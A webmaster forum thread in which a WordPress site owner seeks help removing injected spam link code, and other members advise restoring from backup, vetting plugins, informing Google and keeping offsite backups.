i imagine you are on wordpress? ... if so the first thing to do is update to the latest version, after that check every single plugin you are using to see if there are known exploits ... if there are and they haven't been patched with an updated plugin, then uninstall the plugin.

Locate date of the infection then nuke by restoring from the last valid backup. THEN update to latest and VET the plugins desired (or remove).

You do have a backup, right?

Google offers some help and tools for removal and repair: [support.google.com...]

Since they may flag your site for malware and not show it until it is fixed, you may need to have it re-approved: [support.google.com...]

Hi topr8,
Thanks for replying... Yes I am on WP ... I saw the spammy link code in a report run by my security plugin Wordfence. See screenshot:
[screencast.com...]

Unlike with other issues, Wordfence couldn't fix or delete the problem, so I was left trying to figure out how to get rid of it.

I am also reluctant to delete some plugins because some are custom and were created by a Developer I hired... so, I have to be careful.

I have to be careful.

Good thinking. If you’re not careful, you might find your files infected with malware.

Hi tangor,
Thanks for replying. Yes I do have a backup.

I managed to find one of them that was downloaded just before the malware infection.

I have now uploaded it and stripped out all the old dormant or unnecessary plugins.
I have installed and run Wordfence... and cleaned up a lot of files.

This seems to have worked.

Thanks not2easy,
I rebuilt one of my sites, a Nutrition site, in pure HTML and CSS. It takes up a comparatively tiny amount of file space compared with the WP files.

However, G Webmaster has shown my traffic drop off to to zero. I suspect due to the pages now ending with ".html"

I will look at your web pages you've linked to and start the process of informing Google of my recent infection. I think I'll install a fresh WP and re-build it. Unfortunately I don't have a backup for the Nutrition site, but I do have the edited style.css file, so it should take long to get it resembling the WP original.

@avery123 ... that is good news! Don't forget to take an immediate snapshot of the new/revised install as soon as possible, and mark it for hold 'til the sun shines, Nellie!

If your traffic has "dropped off to zero" it could be that Google has detected a security/malware problem already. If so, I believe they would let you know in GSC.

As long as you have a sitemap that shows the current URLs it should not make much difference what those URLs end with. Best practice would be to redirect the old URLs to the new versions. If your site is being frequently changed it can be difficult to get organic traffic.

@tangor,
Thanks, I will create a backup. Just out of interest, what plugin do you recommend for this?

@not2easy,
The only warning I received from the G Webmaster area was a warning that some links or buttons were too close together for using on smartphones.
This was just after I re-uploaded the site onto a new server.

Thanks, I will create a backup. Just out of interest, what plugin do you recommend for this?

The easiest one: FTP to your local machine! Put it on removable data and put it in a lock box somewhere off site.

Others will have different suggestions. I just like to keep it simple. (KISS method)